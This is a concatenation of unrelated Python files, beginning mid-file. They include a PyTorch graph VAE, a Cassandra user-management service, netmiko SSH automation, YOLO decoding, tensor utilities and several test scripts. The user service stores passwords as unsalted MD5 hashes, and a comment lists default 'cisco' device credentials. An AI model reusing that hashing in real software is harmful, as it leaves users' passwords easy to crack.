nn.BatchNorm1d(128),
nn.ELU(),
nn.Linear(128, node_dim),
nn.Linear(node_dim, 2*node_dim) # split into mu and pre-softplus sigma
)
for i in range(n_nodes-1)]) # ignore z_n
# decoder: (z_1, z_2 ... z_n) -> parameters of P(x)
self.decoder = nn.Sequential(
nn.Linear(node_dim*n_nodes, 256),
nn.BatchNorm1d(256),
nn.ELU(),
nn.Linear(256, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, 512),
nn.BatchNorm1d(512),
nn.ELU(),
nn.Linear(512, input_dim)
)
# mean of Bernoulli variables c_{i,j} representing edges
self.gating_params = nn.ParameterList([
nn.Parameter(torch.empty(n_nodes - i - 1, 1, 1).fill_(0.5), requires_grad=True)
for i in range(n_nodes-1)]) # ignore z_n
# distributions for sampling
self.unit_normal = D.Normal(torch.zeros(self.node_dim), torch.ones(self.node_dim))
self.gumbel = D.Gumbel(0., 1.)
# other parameters / distributions
self.tau = 1.0
def forward(self, x):
# x: (batch_size, input_size)
hx = self.encoder(x)
# sample z_n from N(0, I)
z_n = self.unit_normal.sample([x.size(0)]).to(x.device)
parents = [z_n]
mu_z = [torch.zeros(x.size(0), self.node_dim).to(x.device)]
sigma_z = [torch.ones(x.size(0), self.node_dim).to(x.device)]
for i in reversed(range(self.n_nodes-1)):
self.gating_params[i].data = self.gating_params[i].data.clamp(0., 1.)
# compute gating constants c_{i,j}
mu = self.gating_params[i]
eps1, eps2 = self.gumbel.sample(mu.size()).to(x.device), self.gumbel.sample(mu.size()).to(x.device)
num = torch.exp((eps2 - eps1)/self.tau)
t1 = torch.pow(mu, 1./self.tau)
t2 = torch.pow((1.-mu), 1./self.tau)*num
c = t1 / (t1 + t2 + EPSILON)
if torch.isnan(t1).any() or torch.isnan(t2).any() or torch.isnan(c).any() or torch.isnan(mu).any():
print(t1,t2,c,mu)
# find concatenated parent vector
parent_vector = (c * torch.stack(parents)).permute(1,0,2).reshape(x.size(0), -1)
# top-down inference
td = self.top_down[i](parent_vector)
mu_td, sigma_td = td[:, :self.node_dim], F.softplus(td[:, self.node_dim:])
# bottom-up inference
bu = self.bottom_up[i](hx)
mu_bu, sigma_bu = bu[:, :self.node_dim], F.softplus(bu[:, self.node_dim:])
# precision weighted fusion
mu_zi = (mu_td * sigma_bu**2 + mu_bu * sigma_td**2) / (sigma_td**2 + sigma_bu**2 + EPSILON)
sigma_zi = (sigma_bu * sigma_td) / (torch.sqrt(sigma_td**2 + sigma_bu**2) + EPSILON)
# sample z_i from P(z_i | pa(z_i), x)
z_i = mu_zi + sigma_zi * self.unit_normal.sample([x.size(0)]).to(x.device)
# store samples and parameters
parents.append(z_i)
mu_z.append(mu_zi)
sigma_z.append(sigma_zi)
# sample from approximate posterior distribution q(z_1, z_2 ... z_n|x)
z = torch.cat(parents, dim=1)
out = torch.sigmoid(self.decoder(z))
# build output
output = {}
output['mu'] = out
output['means'] = mu_z
output['sigmas'] = sigma_z
# output['gate_params'] = self.gating_params.detach()
return output
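# A quick shape-check sketch, assuming the `base.BaseModel` import above
# resolves (it is assumed to wrap nn.Module in the project this comes from).
# eval() is used so the BatchNorm layers rely on their running statistics in
# this tiny demo.
def _example_forward():
    model = GraphVAE(input_dim=784, n_nodes=4, node_dim=8)
    model.eval()
    x = torch.rand(16, 784)
    out = model(x)
    print(out['mu'].shape)    # torch.Size([16, 784])
    print(len(out['means']))  # n_nodes entries: z_n plus z_1 .. z_{n-1}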
|
456017
|
from dse.cqlengine import columns
from dse.cqlengine.models import Model
from dse.cqlengine.query import LWTException
from datetime import datetime
import hashlib
import validate_email
from .user_management_events_kafka import UserManagementPublisher
class UserModel(Model):
"""Model class that maps to the user table"""
__table_name__ = 'users'
user_id = columns.UUID(db_field='userid', primary_key=True)
first_name = columns.Text(db_field='firstname')
last_name = columns.Text(db_field='lastname')
email = columns.Text()
created_date = columns.Date()
class UserCredentialsModel(Model):
"""Model class that maps to the user_credentials table"""
__table_name__ = 'user_credentials'
email = columns.Text(primary_key=True)
user_id = columns.UUID(db_field='userid')
password = columns.Text()
def trim_and_hash_password(password):
md5_hashlib = hashlib.md5()
md5_hashlib.update(password.strip().encode('utf-8'))
return md5_hashlib.hexdigest()
class UserManagementService(object):
"""Provides methods that implement functionality of the UserManagement Service."""
def __init__(self):
self.user_management_publisher = UserManagementPublisher()
def create_user(self, user_id, first_name, last_name, email, password):
# validate inputs
if not validate_email.validate_email(email):
raise ValueError('Invalid email address')
# trim and hash the password
hashed_password = trim_and_hash_password(password)
# insert into user_credentials table first so we can ensure uniqueness with LWT
try:
UserCredentialsModel.if_not_exists().create(user_id=user_id, email=email, password=hashed_password)
except LWTException:
# Exact string in this message is expected by integration test
raise ValueError('Exception creating user because it already exists for ' + email)
# insert into users table
UserModel.create(user_id=user_id, first_name=first_name, last_name=last_name, email=email)
# Publish UserCreated event
self.user_management_publisher.publish_user_created_event(user_id=user_id, first_name=first_name,
last_name=last_name, email=email,
timestamp=datetime.utcnow())
def verify_credentials(self, email, password):
# validate email is not empty or null
if not email:
raise ValueError('No email address provided')
# retrieve the credentials for provided email from user_credentials table
user_credentials = UserCredentialsModel.get(email=email)
if not user_credentials:
raise ValueError('No such user')
# compare hashed password values
hashed_password = trim_and_hash_password(password)
if not (hashed_password == user_credentials.password):
raise ValueError('Authentication error')
return user_credentials.user_id
def get_user_profile(self, user_ids):
if not user_ids:
raise ValueError('No user IDs provided')
# see: https://datastax.github.io/python-driver/cqlengine/queryset.html#retrieving-objects-with-filters
# filter().all() returns a ModelQuerySet, we iterate over the query set to get the Model instances
user_results = UserModel.filter(user_id__in=list(user_ids)).all()
users = list()
for user in user_results:
users.append(user)
return users
|
456032
|
import numpy as np
from keras import backend as K
import os
import sys
def patch_path(path):
return os.path.join(os.path.dirname(__file__), path)
def main():
K.set_image_dim_ordering('tf')
sys.path.append(patch_path('..'))
from keras_video_classifier.library.recurrent_networks import VGG16BidirectionalLSTMVideoClassifier
from keras_video_classifier.library.utility.plot_utils import plot_and_save_history
from keras_video_classifier.library.utility.ucf.UCF101_loader import load_ucf
data_set_name = 'UCF-101'
input_dir_path = patch_path('very_large_data')
output_dir_path = patch_path('models/' + data_set_name)
report_dir_path = patch_path('reports/' + data_set_name)
np.random.seed(42)
# this line downloads the video files of UCF-101 dataset if they are not available in the very_large_data folder
load_ucf(input_dir_path)
classifier = VGG16BidirectionalLSTMVideoClassifier()
history = classifier.fit(data_dir_path=input_dir_path, model_dir_path=output_dir_path, data_set_name=data_set_name)
plot_and_save_history(history, VGG16BidirectionalLSTMVideoClassifier.model_name,
report_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-history.png')
if __name__ == '__main__':
main()
|
456047
|
from concurrent.futures import ThreadPoolExecutor
from pprint import pprint
from datetime import datetime
import time
from itertools import repeat
import logging
import yaml
from netmiko import ConnectHandler, NetMikoAuthenticationException
logging.getLogger("paramiko").setLevel(logging.WARNING)
logging.basicConfig(
filename="ssh_connections.log",
format="%(threadName)s %(name)s %(levelname)s: %(message)s",
level=logging.INFO,
)
def send_show(device_dict, command):
ip = device_dict["host"]
logging.info(f"===> {datetime.now().time()} Connection: {ip}")
with ConnectHandler(**device_dict) as ssh:
ssh.enable()
result = ssh.send_command(command)
logging.info(f"<=== {datetime.now().time()} Received: {ip}")
return result
def send_command_to_devices(devices, command):
data = {}
with ThreadPoolExecutor(max_workers=2) as executor:
result = executor.map(send_show, devices, repeat(command))
for device, output in zip(devices, result):
data[device["host"]] = output
return data
if __name__ == "__main__":
with open("devices.yaml") as f:
devices = yaml.safe_load(f)
pprint(send_command_to_devices(devices, "sh ip int br"), width=120)
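# Expected structure of devices.yaml (a hypothetical inventory; each mapping
# is passed to netmiko's ConnectHandler via **device_dict):
#
# - device_type: cisco_ios
#   host: 192.168.100.1
#   username: cisco
#   password: cisco
#   secret: cisco
# - device_type: cisco_ios
#   host: 192.168.100.2
#   username: cisco
#   password: cisco
#   secret: cisco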
|
456065
|
from __future__ import print_function, absolute_import
from collections import OrderedDict
import numpy as np
import tables
from six import iteritems
from ._result import H5NastranResult
from ._bdf import H5NastranBDF
class H5Nastran(H5NastranBDF, H5NastranResult):
def __init__(self, h5filename, mode='r', nastran_type=None, nastran_version=None, in_memory=False):
super(H5Nastran, self).__init__(h5filename, mode=mode, nastran_type=nastran_type,
nastran_version=nastran_version, in_memory=in_memory)
if mode == 'w':
self._write_info()
else:
self._update()
def visualize(self):
from ..gui.visualization import to_vtk
if self.bdf is None:
self.load_bdf()
vtk_data = to_vtk(self.bdf)
vtk_data.visualize()
def _write_info(self):
import pyNastran
info = 'h5Nastran version %s\nPowered by pyNastran version %s' % (self.h5n_version_str, pyNastran.__version__)
self.h5f.create_array(self.table_paths.about_path, self.table_paths.about_table, obj=info.encode(),
title='h5Nastran Info', createparents=True)
versioning_dtype = np.dtype([
('H5NASTRAN_VERSION_STR', 'S8'),
('H5NASTRAN_VERSION', '<i8', (3,)),
('NASTRAN_TYPE', 'S8'),
('NASTRAN_VERSION', '<i8', (3,))
])
format = tables.descr_from_dtype(versioning_dtype)[0]
self.h5f.create_table(self.table_paths.versioning_path, self.table_paths.versioning_table, format,
'VERSIONING', expectedrows=1, createparents=True)
table = self.h5f.get_node(self.table_paths.versioning)
data = np.zeros(1, dtype=versioning_dtype)
data['H5NASTRAN_VERSION_STR'][0] = self.h5n_version_str
data['H5NASTRAN_VERSION'][0] = self.h5n_version
nastran_type = self.nastran_type
if nastran_type is None:
nastran_type = ''
data['NASTRAN_TYPE'][0] = nastran_type
data['NASTRAN_VERSION'][0] = self.nastran_version
table.append(data)
self.defaults.save(self)
self.h5f.flush()
def _update(self):
self.nastran.update()
self.defaults.load(self)
def element_search(self, elem_types=None, elem_pids=None, elem_ids=None, box=None, partial_fit=True):
class Dummy(object):
def __contains__(self, val):
return True
def __le__(self, val):
return True
def __ge__(self, val):
return True
dummy = Dummy()
if elem_types is None:
elem_types = dummy
if elem_pids is None:
elem_pids = dummy
if elem_ids is None:
elem_ids = dummy
if box is None:
min_x = dummy
max_x = dummy
min_y = dummy
max_y = dummy
min_z = dummy
max_z = dummy
else:
x, y, z = box
if x is None:
min_x = dummy
max_x = dummy
else:
min_x, max_x = x
if y is None:
min_y = dummy
max_y = dummy
else:
min_y, max_y = y
if z is None:
min_z = dummy
max_z = dummy
else:
min_z, max_z = z
if min_x is None:
min_x = dummy
if min_y is None:
min_y = dummy
if min_z is None:
min_z = dummy
if max_x is None:
max_x = dummy
if max_y is None:
max_y = dummy
if max_z is None:
max_z = dummy
elms = []
bdf = self.bdf
for eid, elm in iteritems(bdf.elements):
pid = elm.pid
etype = elm.type
if etype not in elem_types:
continue
if pid not in elem_pids:
continue
if eid not in elem_ids:
continue
nodes = elm.node_ids
in_box = set()
bdf_nodes = bdf.nodes
for nid in nodes:
node = bdf_nodes[nid]
x, y, z = node.get_position()
if min_x <= x <= max_x and min_y <= y <= max_y and min_z <= z <= max_z:
in_box.add(True)
else:
in_box.add(False)
if partial_fit:
if True in in_box:
elms.append(elm)
else:
if False not in in_box:
elms.append(elm)
return elms
|
456073
|
effects = {
# instruction name -> [bytes, newva, constraints, effects]
'rdtsc': ('0f31', None, (),
('edx = TSC_HIGH',
'eax = TSC_LOW')),
'div16': ('66f7f2', None, (),
('eax = (((((edx & 0x0000ffff) << 16) | (eax & 0x0000ffff)) / (edx & 0x0000ffff)) | (eax & 0xffff0000))',
'edx = (((((edx & 0x0000ffff) << 16) | (eax & 0x0000ffff)) % (edx & 0x0000ffff)) | (edx & 0xffff0000))')
),
'div32': ('f7f1', None, (),
('eax = (((edx << 32) | eax) / ecx)',
'edx = (((edx << 32) | eax) % ecx)')
),
'cwde': ('98', None, (),
('eax = signextend((eax & 0x0000ffff), 4)',)
),
'cdq': ('99', None, (),
('eax = signextend((eax & 0x0000ffff), 4)',
'edx = (signextend((eax & 0x0000ffff), 8) >> 32)')
),
'ror': ('C1C90C', None, (),
('ecx = ((ecx >> (12 % 32)) | (ecx << (32 - (12 % 32))))',)
),
# rol ebx,cl
'rol': ('d3c3', None, (),
('ebx = ((ebx << ((ecx & 255) % 32)) | (ebx >> (32 - ((ecx & 255) % 32))))',)
),
}
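# A small sketch of how the table above can be consumed: each entry maps an
# instruction name to its raw opcode bytes, an optional new virtual address,
# constraint strings, and the symbolic register effects.
if __name__ == '__main__':
    opcode_hex, newva, constraints, symbolic_effects = effects['rdtsc']
    print('rdtsc opcodes:', bytes.fromhex(opcode_hex))
    for effect in symbolic_effects:
        print('  ', effect)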
|
456075
|
import os
import unittest
from os.path import expanduser
from util.Docker import Docker
class GoServices(unittest.TestCase):
def test_go(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
code_dir = script_dir + "/.."
home = expanduser("~")
goPath = os.environ['GOPATH']
command = ['docker', 'run', '--rm', '-v', goPath + ':/go/src/', '-v', code_dir + ':/go/src/github.com/microservices-demo/catalogue', '-w', '/go/src/github.com/microservices-demo/catalogue', '-e', 'GOPATH=/go/', 'golang:1.7', 'go', 'test', '-v', '-covermode=count', '-coverprofile=coverage.out']
print(Docker().execute(command))
if __name__ == '__main__':
unittest.main()
|
456088
|
import numpy as np
from axelerate.networks.yolo.backend.utils.box import BoundBox, nms_boxes, boxes_to_array
class YoloDecoder(object):
def __init__(self,
anchors = [0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828],
nms_threshold=0.2):
self._anchors = anchors
self._nms_threshold = nms_threshold
def run(self, netout, obj_threshold=0.3):
"""Convert Yolo network output to bounding box
# Args
netout : 4d-array, shape of (grid_h, grid_w, num of boxes per grid, 5 + n_classes)
YOLO neural network output array
# Returns
boxes : array, shape of (N, 4)
coordinate scale is normalized [0, 1]
probs : array, shape of (N, nb_classes)
"""
grid_h, grid_w, nb_box = netout.shape[:3]
boxes = []
# decode the output by the network
netout[..., 4] = _sigmoid(netout[..., 4])
netout[..., 5:] = netout[..., 4][..., np.newaxis] * _softmax(netout[..., 5:])
netout[..., 5:] *= netout[..., 5:] > obj_threshold
for row in range(grid_h):
for col in range(grid_w):
for b in range(nb_box):
# from the 4th element onwards are the confidence and class probabilities
classes = netout[row,col,b,5:]
if np.sum(classes) > 0:
# first 4 elements are x, y, w, and h
x, y, w, h = netout[row,col,b,:4]
x = (col + _sigmoid(x)) / grid_w # center position, unit: image width
y = (row + _sigmoid(y)) / grid_h # center position, unit: image height
w = self._anchors[2 * b + 0] * np.exp(w) / grid_w # unit: image width
h = self._anchors[2 * b + 1] * np.exp(h) / grid_h # unit: image height
confidence = netout[row,col,b,4]
box = BoundBox(x, y, w, h, confidence, classes)
boxes.append(box)
boxes = nms_boxes(boxes, len(classes), self._nms_threshold, obj_threshold)
boxes, probs = boxes_to_array(boxes)
return boxes, probs
def _sigmoid(x):
return 1. / (1. + np.exp(-x))
def _softmax(x, axis=-1, t=-100.):
x = x - np.max(x)
if np.min(x) < t:
x = x/np.min(x)*t
e_x = np.exp(x)
return e_x / e_x.sum(axis, keepdims=True)
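# A hedged usage sketch, assuming the axelerate box utilities imported above
# are installed. The network output is random here, so the decoded boxes are
# meaningless; the point is the expected input shape
# (grid_h, grid_w, boxes_per_grid, 5 + n_classes).
def _example_decode():
    n_classes = 2
    netout = np.random.rand(7, 7, 5, 5 + n_classes).astype(np.float32)
    decoder = YoloDecoder()
    boxes, probs = decoder.run(netout, obj_threshold=0.3)
    print(boxes.shape, probs.shape)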
|
456159
|
import functools
import torch
class TensorList(list):
"""Container mainly used for lists of torch tensors. Extends lists with pytorch functionality."""
def __init__(self, list_of_tensors = None):
if list_of_tensors is None:
list_of_tensors = list()
super(TensorList, self).__init__(list_of_tensors)
def __getitem__(self, item):
if isinstance(item, int):
return super(TensorList, self).__getitem__(item)
elif isinstance(item, (tuple, list)):
return TensorList([super(TensorList, self).__getitem__(i) for i in item])
else:
return TensorList(super(TensorList, self).__getitem__(item))
def __add__(self, other):
if TensorList._iterable(other):
return TensorList([e1 + e2 for e1, e2 in zip(self, other)])
return TensorList([e + other for e in self])
def __radd__(self, other):
if TensorList._iterable(other):
return TensorList([e2 + e1 for e1, e2 in zip(self, other)])
return TensorList([other + e for e in self])
def __iadd__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] += e2
else:
for i in range(len(self)):
self[i] += other
return self
def __sub__(self, other):
if TensorList._iterable(other):
return TensorList([e1 - e2 for e1, e2 in zip(self, other)])
return TensorList([e - other for e in self])
def __rsub__(self, other):
if TensorList._iterable(other):
return TensorList([e2 - e1 for e1, e2 in zip(self, other)])
return TensorList([other - e for e in self])
def __isub__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] -= e2
else:
for i in range(len(self)):
self[i] -= other
return self
def __mul__(self, other):
if TensorList._iterable(other):
return TensorList([e1 * e2 for e1, e2 in zip(self, other)])
return TensorList([e * other for e in self])
def __rmul__(self, other):
if TensorList._iterable(other):
return TensorList([e2 * e1 for e1, e2 in zip(self, other)])
return TensorList([other * e for e in self])
def __imul__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] *= e2
else:
for i in range(len(self)):
self[i] *= other
return self
def __truediv__(self, other):
if TensorList._iterable(other):
return TensorList([e1 / e2 for e1, e2 in zip(self, other)])
return TensorList([e / other for e in self])
def __rtruediv__(self, other):
if TensorList._iterable(other):
return TensorList([e2 / e1 for e1, e2 in zip(self, other)])
return TensorList([other / e for e in self])
def __itruediv__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] /= e2
else:
for i in range(len(self)):
self[i] /= other
return self
def __matmul__(self, other):
if TensorList._iterable(other):
return TensorList([e1 @ e2 for e1, e2 in zip(self, other)])
return TensorList([e @ other for e in self])
def __rmatmul__(self, other):
if TensorList._iterable(other):
return TensorList([e2 @ e1 for e1, e2 in zip(self, other)])
return TensorList([other @ e for e in self])
def __imatmul__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] @= e2
else:
for i in range(len(self)):
self[i] @= other
return self
def __mod__(self, other):
if TensorList._iterable(other):
return TensorList([e1 % e2 for e1, e2 in zip(self, other)])
return TensorList([e % other for e in self])
def __rmod__(self, other):
if TensorList._iterable(other):
return TensorList([e2 % e1 for e1, e2 in zip(self, other)])
return TensorList([other % e for e in self])
def __pos__(self):
return TensorList([+e for e in self])
def __neg__(self):
return TensorList([-e for e in self])
def __le__(self, other):
if TensorList._iterable(other):
return TensorList([e1 <= e2 for e1, e2 in zip(self, other)])
return TensorList([e <= other for e in self])
def __ge__(self, other):
if TensorList._iterable(other):
return TensorList([e1 >= e2 for e1, e2 in zip(self, other)])
return TensorList([e >= other for e in self])
def concat(self, other):
return TensorList(super(TensorList, self).__add__(other))
def copy(self):
return TensorList(super(TensorList, self).copy())
def unroll(self):
if not any(isinstance(t, TensorList) for t in self):
return self
new_list = TensorList()
for t in self:
if isinstance(t, TensorList):
new_list.extend(t.unroll())
else:
new_list.append(t)
return new_list
def list(self):
return list(self)
def attribute(self, attr: str, *args):
return TensorList([getattr(e, attr, *args) for e in self])
def apply(self, fn):
return TensorList([fn(e) for e in self])
def __getattr__(self, name):
if not hasattr(torch.Tensor, name):
raise AttributeError('\'TensorList\' object has no attribute \'{}\''.format(name))
def apply_attr(*args, **kwargs):
return TensorList([getattr(e, name)(*args, **kwargs) for e in self])
return apply_attr
@staticmethod
def _iterable(a):
return isinstance(a, (TensorList, list))
def tensor_operation(op):
def islist(a):
return isinstance(a, TensorList)
@functools.wraps(op)
def oplist(*args, **kwargs):
if len(args) == 0:
raise ValueError('Must be at least one argument without keyword (i.e. operand).')
if len(args) == 1:
if islist(args[0]):
return TensorList([op(a, **kwargs) for a in args[0]])
else:
# Multiple operands, assume max two
if islist(args[0]) and islist(args[1]):
return TensorList([op(a, b, *args[2:], **kwargs) for a, b in zip(*args[:2])])
if islist(args[0]):
return TensorList([op(a, *args[1:], **kwargs) for a in args[0]])
if islist(args[1]):
return TensorList([op(args[0], b, *args[2:], **kwargs) for b in args[1]])
# None of the operands are lists
return op(*args, **kwargs)
return oplist
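# A short usage sketch of the container above: elementwise arithmetic is
# broadcast across the wrapped tensors, and unknown attribute calls are
# forwarded to each torch.Tensor element.
if __name__ == '__main__':
    a = TensorList([torch.ones(2), torch.ones(3)])
    b = TensorList([torch.full((2,), 2.0), torch.full((3,), 3.0)])
    print((a + b).list())        # [tensor([3., 3.]), tensor([4., 4., 4.])]
    print((a * 2).sum().list())  # torch.Tensor.sum applied to each element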
|
456181
|
import pytest
from ddtrace.internal.sma import SimpleMovingAverage
from ddtrace.internal.writer import DEFAULT_SMA_WINDOW
def test_min_size():
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
assert DEFAULT_SMA_WINDOW == sma.size
assert DEFAULT_SMA_WINDOW == len(sma.counts)
assert DEFAULT_SMA_WINDOW == len(sma.totals)
with pytest.raises(ValueError):
sma = SimpleMovingAverage(0)
def test_count_greater_than_total():
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
with pytest.raises(ValueError):
sma.set(2, 1)
def test_moving_average():
sma = SimpleMovingAverage(4)
assert 0.0 == sma.get()
sma.set(1, 2)
assert 0.5 == sma.get()
sma.set(2, 2)
assert 0.75 == sma.get()
sma.set(1, 4)
assert 0.5 == sma.get()
sma.set(0, 12)
assert 0.2 == sma.get()
sma.set(2, 2)
assert 0.25 == sma.get()
sma.set(15, 18)
assert 0.5 == sma.get()
sma = SimpleMovingAverage(1)
assert 0.0 == sma.get()
sma.set(1, 2)
assert 0.5 == sma.get()
sma.set(2, 2)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 0.0 == sma.get()
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
assert 0.0 == sma.get()
sma.set(1, 1)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 1.0 == sma.get()
sma.set(0, 4)
assert 0.2 == sma.get()
sma.set(1, 3)
assert 0.25 == sma.get()
sma.set(1, 4)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(7, 8)
assert 0.5 == sma.get()
sma.set(1, 1)
assert 0.5 == sma.get()
sma.set(10, 20)
assert 0.5 == sma.get()
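# Worked arithmetic for the size-4 window exercised above: the average is
# sum(counts in window) / sum(totals in window), and the oldest bucket falls
# out once the window is full.
#   set(1, 2)  -> 1 / 2                = 0.5
#   set(2, 2)  -> (1+2) / (2+2)        = 0.75
#   set(1, 4)  -> (1+2+1) / (2+2+4)    = 0.5
#   set(0, 12) -> (1+2+1+0) / 20       = 0.2
#   set(2, 2)  -> window drops (1, 2): (2+1+0+2) / (2+4+12+2) = 0.25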
|
456184
|
import sys
import unittest
from linkml_runtime.dumpers import rdf_dumper, json_dumper
from linkml_runtime.loaders import yaml_loader
from pyshex.evaluate import evaluate
from linkml.generators.jsonldcontextgen import ContextGenerator
from linkml.generators.shexgen import ShExGenerator
from tests.test_generators.environment import env
from tests.test_generators.test_pythongen import make_python
SCHEMA = env.input_path('kitchen_sink.yaml')
DATA = env.input_path('kitchen_sink_inst_01.yaml')
SHEXLOG = env.expected_path('shexgen_log.txt')
class ShExTestCase(unittest.TestCase):
@unittest.skipIf(sys.version_info < (3, 8), "ShEx has issues with python 3.7 at the moment")
def test_shex(self):
""" shex """
kitchen_module = make_python(False)
inst = yaml_loader.load(DATA, target_class=kitchen_module.Dataset)
shexstr = ShExGenerator(SCHEMA, mergeimports=True).serialize(collections=False)
#print(shexstr)
ctxt = ContextGenerator(SCHEMA, mergeimports=True).serialize()
inst = yaml_loader.load(DATA, target_class=kitchen_module.Dataset)
with open(SHEXLOG, 'w') as log:
log.write(json_dumper.dumps(element=inst, contexts=ctxt))
try:
g = rdf_dumper.as_rdf_graph(element=inst, contexts=ctxt)
except Exception as e:
if 'URL could not be dereferenced' in str(e):
print("WARNING: non-modified version of pyld detected. RDF dumping test skipped")
return
raise e
#print(g)
nodes = set()
for (s,p,o) in g.triples((None, None, None)):
#print(f'{s} {p} {o}')
nodes.add(s)
for node in nodes:
r = evaluate(g, shexstr,
focus=node)
log.write(f'Eval {node} = {r}\n')
# start="http://example.org/model/FriendlyPerson",
# focus="http://example.org/people/42")
if __name__ == '__main__':
unittest.main()
|
456187
|
from __future__ import print_function, unicode_literals
import platform
import sys
info = {
'impl': platform.python_implementation(),
'version': platform.python_version(),
'revision': platform.python_revision(),
'maxunicode': sys.maxunicode,
'maxsize': sys.maxsize
}
search_modules = ['charade', 'chardet', 'datrie', 'genshi', 'html5lib', 'lxml', 'six']
found_modules = []
for m in search_modules:
try:
__import__(m)
except ImportError:
pass
else:
found_modules.append(m)
info['modules'] = ', '.join(found_modules)
print("""html5lib debug info:
Python %(version)s (revision: %(revision)s)
Implementation: %(impl)s
sys.maxunicode: %(maxunicode)X
sys.maxsize: %(maxsize)X
Installed modules: %(modules)s""" % info)
|
456194
|
class ImageBackgroundSettings(BackgroundSettings,IDisposable):
""" Represents the rendering image background settings. """
def Dispose(self):
""" Dispose(self: BackgroundSettings,A_0: bool) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: BackgroundSettings,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
BackgroundImageFit=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The background image fit type.
Get: BackgroundImageFit(self: ImageBackgroundSettings) -> BackgroundImageFit
Set: BackgroundImageFit(self: ImageBackgroundSettings)=value
"""
FilePath=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""File path of the image for the rendering background.
Get: FilePath(self: ImageBackgroundSettings) -> str
Set: FilePath(self: ImageBackgroundSettings)=value
"""
OffsetHeight=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The vertical offset of the rendering image to the rendering region.
Get: OffsetHeight(self: ImageBackgroundSettings) -> float
Set: OffsetHeight(self: ImageBackgroundSettings)=value
"""
OffsetWidth=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The horizontal offset of the rendering image to the rendering region.
Get: OffsetWidth(self: ImageBackgroundSettings) -> float
Set: OffsetWidth(self: ImageBackgroundSettings)=value
"""
|
456195
|
import json
import spacy
from collections import defaultdict
nlp = spacy.load('en_core_web_sm')
def load_json(filename):
"Wrapper function to load JSON data."
with open(filename) as f:
data = json.load(f)
return data
def save_json(data, filename):
"Wrapper function to save the data as JSON."
with open(filename, 'w') as f:
json.dump(data, f)
def compounds_from_doc(doc):
compounds = []
current = []
for token in doc:
if token.tag_.startswith('NN'):
current.append(token.orth_.lower())
elif len(current) == 1:
current = []
elif len(current) > 1:
compounds.append(current)
current = []
if len(current) > 1:
compounds.append(current)
return compounds
def annotate_coco(filename, tag=False, compounds=False):
"Function to annotate existing coco data"
data = load_json(filename)
for entry in data['annotations']:
raw_description = entry['caption']
doc = nlp.tokenizer(raw_description)
entry['tokenized'] = [tok.orth_ for tok in doc]
if tag:
# Call the tagger on the document.
nlp.tagger(doc)
entry['tagged'] = [(tok.orth_.lower(),tok.tag_) for tok in doc]
if compounds:
list_of_compounds = compounds_from_doc(doc)
entry['compounds'] = list_of_compounds
return data
tokenized_train = annotate_coco('./Data/COCO/Raw/captions_train2014.json', tag=True, compounds=True)
save_json(tokenized_train, './Data/COCO/Processed/tokenized_train2014.json')
tagged_val = annotate_coco('./Data/COCO/Raw/captions_val2014.json', tag=True, compounds=True)
save_json(tagged_val, './Data/COCO/Processed/tagged_val2014.json')
|
456204
|
import argparse
import json
import pytest
from typing import Dict, List, Tuple, Union
NestedDict = Dict[str, Union[float, "NestedDict"]]
def flatten_nested_dict(nested_dict: NestedDict) -> Dict[Tuple[str, ...], float]:
def _recursively_flatten(
target: Dict[Tuple[str, ...], float], d: NestedDict, prefix: List[str]
) -> Dict[Tuple[str, ...], float]:
for key, value in d.items():
if isinstance(value, dict):
_recursively_flatten(target, value, prefix + [key])
else:
target[tuple(prefix + [key])] = value
return target
return _recursively_flatten({}, nested_dict, [])
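# Illustrative example (not part of the original script): flattening turns nested
# keys into tuple keys, e.g.
#   flatten_nested_dict({"rouge": {"r1": 0.4, "r2": 0.2}})
#   -> {("rouge", "r1"): 0.4, ("rouge", "r2"): 0.2}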
def assert_dicts_approx_equal(
d1: NestedDict, d2: NestedDict, rel: float = None, abs: float = None
):
d1 = flatten_nested_dict(d1)
d2 = flatten_nested_dict(d2)
assert d1.keys() == d2.keys()
for key in d1.keys():
assert d1[key] == pytest.approx(d2[key], rel=rel, abs=abs), (key, d1[key], d2[key])
def load_scores(input_file: str):
scores_dict = {}
with open(input_file, "r") as f:
for line in f:
instance = json.loads(line)
scores_dict[(instance["instance_id"], instance["summarizer_id"])] = instance
return scores_dict
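# Each scores file is expected to be JSON Lines; an illustrative (made-up) line:
#   {"instance_id": "d001", "summarizer_id": "s1", "metrics": {"rouge": {"r1": 0.41}}}
# load_scores keys each record by (instance_id, summarizer_id) so the two runs can
# be compared entry by entry in main().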
def main(args):
original = load_scores(args.original)
docker = load_scores(args.docker)
assert len(original) == len(docker)
for key in original.keys():
assert_dicts_approx_equal(original[key]["metrics"], docker[key]["metrics"], abs=1e-4)
print("Equal", args.original, args.docker)
if __name__ == '__main__':
argp = argparse.ArgumentParser()
argp.add_argument("--original", required=True)
